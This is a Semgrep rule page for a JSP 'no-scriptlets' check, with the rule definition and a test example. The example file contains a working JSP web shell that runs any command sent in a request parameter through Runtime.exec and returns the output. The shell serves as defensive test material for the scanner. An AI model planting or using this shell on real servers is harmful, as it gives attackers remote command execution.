java.lang.security.audit.xss.jsp.no-scriptlets.no-scriptlets
semgrep
Author
6,309
Download Count*
License
JSP scriptlet detected. Scriptlets are difficult to use securely and are considered bad practice. See https://stackoverflow.com/a/3180202. Instead, consider migrating to JSF or using the Expression Language '${...}' with the escapeXml function in your JSP files.
Run Locally
Run in CI
Defintion
rules:
- id: no-scriptlets
message: JSP scriptlet detected. Scriptlets are difficult to use securely and
are considered bad practice. See https://stackoverflow.com/a/3180202.
Instead, consider migrating to JSF or using the Expression Language
'${...}' with the escapeXml function in your JSP files.
metadata:
owasp:
- A03:2021 - Injection
cwe:
- "CWE-116: Improper Encoding or Escaping of Output"
references:
- https://stackoverflow.com/a/3180202
- https://stackoverflow.com/a/4948856
category: security
technology:
- jsp
subcategory:
- audit
likelihood: LOW
impact: LOW
confidence: LOW
license: Commons Clause License Condition v1.0[LGPL-2.1-only]
vulnerability_class:
- Improper Encoding
pattern-regex: \<\%[^\@].*
paths:
include:
- "*.jsp"
languages:
- regex
severity: WARNING
Examples
no-scriptlets.jsp
<!-- cf. https://github.com/JoyChou93/webshell/blob/4a2f049afe009f9cc061357b002cff78c06d6c43/jsp/cmd.jsp -->
<!-- ok: no-scriptlets -->
<%@ page import="java.util.*,java.io.*"%>
<!-- ruleid: no-scriptlets -->
<% %>
<HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION="">
<INPUT TYPE="text" NAME="comment">
<INPUT TYPE="submit" VALUE="Send">
</FORM> <pre>
<!-- ruleid: no-scriptlets -->
<%
if ( request.getParameter( "comment" ) != null )
{
out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" );
Process p = Runtime.getRuntime().exec( request.getParameter( "comment" ) );
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream( in );
String disr = dis.readLine();
while ( disr != null )
{
out.println( disr ); disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
Short Link: https://sg.run/l2LG